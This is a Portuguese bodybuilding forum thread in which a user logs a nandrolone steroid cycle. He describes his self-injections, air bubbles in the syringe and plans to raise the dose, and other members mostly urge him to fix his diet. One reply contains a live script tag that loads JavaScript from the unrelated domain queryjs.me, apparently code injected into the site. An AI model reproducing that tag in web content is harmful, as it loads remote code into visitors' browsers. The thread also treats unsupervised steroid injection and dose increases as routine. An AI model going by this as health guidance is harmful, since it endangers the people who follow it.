Ir para conteúdo
  • Cadastre-se

Posts Recomendados

Postado

Relato: Ganhos mesma coisa, quase nada. Começou as aula da minha faculdade e ta bem corrido pra mim, dieta ta foda de seguir, tinha pego uma gripe semana passada, já estou melhor só a garganta que ta inflamada ainda. Ontem era dia de aplicação e não apliquei, eu tenho que pegar o onibus da faculdade as 16:30 e já eram 16:00 quando sai do serviço e fui aplicar, acontece que ficou um monte de bolhinhas bem no meio do óleo na seringa, tirei todo ar q tinha mais aquelas bolhinhas não saíram, resolvi não aplicar, e como já tava atrasado pra pegar o onibus deixei pra hoje. Essas bolhinhas no meio da seringa é ar ou é normal?

Publicidade

Postado (editado)

Relato: Fiz a aplicação e por enquanto tudo normal, dores leves pelo que falam de lander pra mim ta tudo de boa, quanto aos ganhos estão médios, mas parece q to perdendo BF, não to seguindo dieta certa =/

Foi a 5ª semana, quase certo que vou estender pra 10 semanas.

Editado por MagnoxD
Postado

Relato: Fiz a aplicação e por enquanto tudo normal, dores leves pelo que falam de lander pra mim ta tudo de boa, quanto aos ganhos estão médios, mas parece q to perdendo BF, não to seguindo dieta certa =/

Oque eu disse : v

Postado

Brow, posta umas fotos ai pra gente ter ideia da evolução, as vezes agente consegue ver melhor estando de fora!10 semanas e o minimo pra mim!

Segue a dieta pporra....kkk

Postado

<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

iiiiiiiii .. faz essa porra certo! kkkkkkk

Se fizer 15 semanas vai continuar não tendo o resultado que voce quer comendo errado.

Postado

Brow, nas fotos da pra notar que qualidade tem melhorado, mas com deca e pra ganhar mais volume ainda! Então se esforça na porr.... da dieta caraiiii...kkk

Postado (editado)

Desculpem...apaguei meu comentario, pois não consegui o deletar...

Não estava dentro das regras.

Bons treinos e bons ciclos!!

Abraços

Editado por Zero62
Postado

Meu problema é a consistencia da dieta, tem dia q como bem tem dia q não, ontem mesmo quase vomitei depois do treino, e fiquei malzão pra comer, as proteinas eu tento mandar ao máximo, eu sou muito enrolado na questão de tempo, trampo de dia e estudo a noite, ta bem corrido mais sempre tento me alimentar do jeito q da. Pensando em aumentar a dosagem da deca ~~. Outra coisa é meu serviço, semana q vem vou viajar a trabalho e vou ficar uma semana fazendo curso, vou aplicar no domingo antes de ir e no sábado quando voltar, problema?

Relato: Apliquei ontem no vasto, doeu pq tenho problema de tremer, e comecei a tremer muito na hora, consegui mandar 1ml e o depois meu amigo q terminou pra mim haha, mas hoje to com só uma dorzinha de leve, to andando de boa. É isso até mais.

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
  • Criar Novo...